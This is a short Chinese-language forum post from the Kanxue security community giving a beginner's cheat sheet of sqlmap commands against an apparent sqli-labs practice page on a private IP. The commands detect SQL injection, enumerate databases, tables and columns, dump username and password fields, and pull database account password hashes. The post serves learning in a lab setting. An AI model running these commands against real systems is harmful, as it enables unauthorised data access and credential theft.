[推荐]sqlmap基础使用方法-茶余饭后-看雪-安全社区|安全招聘|kanxue.com

xiaobaijia 活跃值

2020-1-19 15:33

2154

小白路过，大佬勿喷！！！

--batch可以不用交互默认进行

检测注入点

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1

查看所有数据库

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --dbs

查看当前数据库

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-db --batch

列出数据库中的表

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security --tables --batch

-D 指定数据库名

--tables 列出表

列出表中字段

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users --columns --batch

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users -C "username,password" --dump --batch

-C 指定的字段

--dump 将结果导出

当前数据库使用账户

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-user --batch

列出数据库所有用户

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --users --batch

获取数据库账户密码

sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --passwords --batch

最后于 2020-1-19 15:38 被xiaobaijia编辑，原因：

收藏・0

免费・0

支持

最新回复 (1)
xiaobaijia 雪币： 577 活跃值： (102) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 11 粉丝 0 关注私信	xiaobaijia 2 楼为什么一部分图片不显示出来呢！ 2020-1-19 15:39 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

xiaobaijia

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (1)
xiaobaijia 雪币： 577 活跃值： (102) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 11 粉丝 0 关注私信	xiaobaijia 2 楼为什么一部分图片不显示出来呢！ 2020-1-19 15:39 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复